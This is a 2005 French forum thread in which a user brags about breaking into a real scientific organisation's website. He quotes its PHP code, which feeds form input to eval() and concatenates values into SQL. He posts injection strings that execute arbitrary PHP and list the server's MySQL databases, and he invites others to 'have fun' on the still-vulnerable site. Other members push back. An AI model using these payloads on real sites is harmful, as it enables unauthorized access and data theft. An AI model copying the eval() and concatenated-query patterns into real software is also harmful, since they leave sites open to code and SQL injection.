realisation de sites internet :

- Hacké

Site gratuit de petites annonces autos
occasion Citroen



 Retour Site Honolulu  |  Nouveau sujet  |  Retour aux sujets  |  Chercher  |  Connexion    
 Hacké
Auteur: sacha
((---.ppp.tiscali.fr)
Date: 09-03-2005 22:09
673 messages postés sur  la réalisation de sites internet [ 673 msg ]
Bonjour #rire#
Je vous anonce que ce soir c'est la première fois dans ma vie que j'ai... "hacké" un site.
Je ne vous donnerai pas l'adresse, l'exploit est trop simple,, en effet, les données de leur formulaire étaient traitées par la fonction eval(). Quand j'ai réussi à exécuter les commandes de mon choix, je me suis interessé à la source de leur page de recherche. À un moment, il y a écrit ceci:

while (list ($key, $val) = @each ($_POST))
{
eval("$$key=\"$val\";");
}

Vous voyez maintenant, que l'idée semble d'être bonne, mais en réalité c'est très dangereux. Maintenant il me suffisait d'écrire dans ce champ de recherche, par exemple:

"; echo "Commande executée à l'insu de l'admin"; #

Et ça marchait! J'ai fouillé partout: les mots de passe, phpinfo, $_SERVER, tout... J'ai eu accès à la base des données... je peux voir la source de n'importe quel fichier!

Et voilà! Ceux qui nous semblent être des pros ne sont qu'en réalité que des programmeurs ratés. Je ne dirais pas ça s'il s'agissait d'un site fait par un débutant, mais là! ... J'ai même trouvé dans le code source:

$que="SELECT year, title, authors, review, volume,
issue, pdf, keyword, page_first, page_last, pubMed_id, pdf_weight FROM publications WHERE year=' ".$year." ' ORDER BY `".$order."` DESC";

Ce qui permet d'exécuter la requête de mon choix en attribuant à year " ' {MA REQUETE} # " C'était un programmeur salarié. En effet, c'est là où travaille mon père, c'est ppour ça que je le sais. Mais le site est immense, international et il s'agit des scienses.

Tout ça pour vous alerter et pour vous rappeller que la sécurité avant tout! Dites ce que vous en pensez.

Répondre à ce message
 
 Re: Hacké
Auteur: honolulu
(---.adsl.proxad.net)
Date: 14-03-2005 09:09
1520 messages postés sur  la réalisation de sites internet [ 1520 msg ]
Et bien tu envois un petit mail à l'administrateur et tu lui fais part de tes remarques #clin#
Il n'a qu'à utiliser un htmlentities() pour son champ de recherche pour bloquer les éventuels scripts...

a++

Répondre à ce message
 
 Re: Hacké
Auteur: sacha
((---.ppp.tiscali.fr)
Date: 14-03-2005 11:36
673 messages postés sur  la réalisation de sites internet [ 673 msg ]
Oui, c'est ce que j'ai fait à l'heure où j'ai écris le message.
Malheureusement pour eux, le problème n'est toujours pas corrigé. J'ai envoyé un message concernant cette faille et aucun destinataire n'a répondu, sauf un qui ne savait parler que anglais et il a spécifié qu'il ne s'occupe pas du site en question mais du même site version anglaise... Bref, je pense que tout simplement je vais me rendre à Luminy et je parlerai de cela à Ben-Ari (le directeur). Je suis pose qu'avec une petite démonstration de ce que cette faille permet de faire, il m'autorisera à la corriger.

Répondre à ce message
 
 Re: Hacké
Auteur: sacha
((---.ppp.tiscali.fr)
Date: 26-03-2005 13:12
673 messages postés sur  la réalisation de sites internet [ 673 msg ]
Amusez-vous bien!
[URL effacée : pas d'incitation au piratage svp (réprimé par la loi) ]Site vulnérable

Pourquoi je fais ça? Heu, d'abord, ce site ne se trouve pas sur les serveurs de l'entreprise concernée. Ensuite, j'ai essayé d'avertir 100 fois mais je n'ai pas eu de réponse.

Essayez par exemple de mettre ceci dans le champ proposé:

"; $db="bdd";$base_id=mysql_connect($server,$login,$password); $dbs=mysql_list_dbs($base_id);while ($res=mysql_fetch_array($dbs)){echo $res[0]."<br>"; echo "<br>";} #

Répondre à ce message
 
 Re: Hacké
Auteur: sacha
((---.ppp.tiscali.fr)
Date: 30-03-2005 13:19
673 messages postés sur  la réalisation de sites internet [ 673 msg ]
Bizarre que cette loi.
Alors pour ceux qui sont interessés, pour ne pas mettre Honolulu en danger:
le même sujet sur les forums d'EasyPHP (sous résponsabilité de Thierry)

Répondre à ce message
 
 Re: Hacké
Auteur: honolulu
(---.adsl.proxad.net)
Date: 30-03-2005 14:53
1520 messages postés sur  la réalisation de sites internet [ 1520 msg ]
Je ne retiendrais qu'une chose dite par l'un des créateurs de easyPhp qui plus est #air# :
"Essaye de faire marcher EasyPHP sur ta becane au lieu de faire des conneries."

Répondre à ce message
 
 Re: Hacké
Auteur: sacha
((---.ppp.tiscali.fr)
Date: 31-03-2005 13:00
673 messages postés sur  la réalisation de sites internet [ 673 msg ]
Exact #clin#

Répondre à ce message
 
 Re: Hacké
Auteur: AnG3lz
((---.fbx.proxad.net)
Date: 14-08-2005 14:20
7 messages postés sur  la réalisation de sites internet [ 7 msg ]
t kontent de toi ? mdrrrrrrrr taa utiliser un proxy au moin ?mdrrrrrrrrrrrr

Répondre à ce message
 
 Re: Hacké
Auteur: honolulu
(---.adsl.proxad.net)
Date: 14-08-2005 19:10
1520 messages postés sur  la réalisation de sites internet [ 1520 msg ]
les proxy ne servent pas ou plus à grand chose vu qu'ils existent des traceurs pour remonter à l'origine des connexions...

Répondre à ce message
 
 Re: Hacké
Auteur: sacha
((---.ppp.tiscali.fr)
Date: 13-10-2005 21:47
673 messages postés sur  la réalisation de sites internet [ 673 msg ]
Non, je leur ai fait aucun mal :) Je les ai prévenus en plus. Je n'ai eu aucune réponse. Tant pis pour eux.

Répondre à ce message
 Retour Site Honolulu  |  Liste des Forums    

 Liste des Forums  |  Nouvel utilisateur ? Enregistrez-vous ici 
 Connexion
 Nom d'utilisateur:
 Mot de passe:
 Enregistrer mon profil:
   
 Mot de passe perdu ?
Écrivez votre adresse Email ou votre Identifiant ci-dessous et un nouveau mot de passe sera envoyé sur l'Email lié à votre profil.
phorum.org
Honolulu : créateur de site internet à Annecy et sur le web !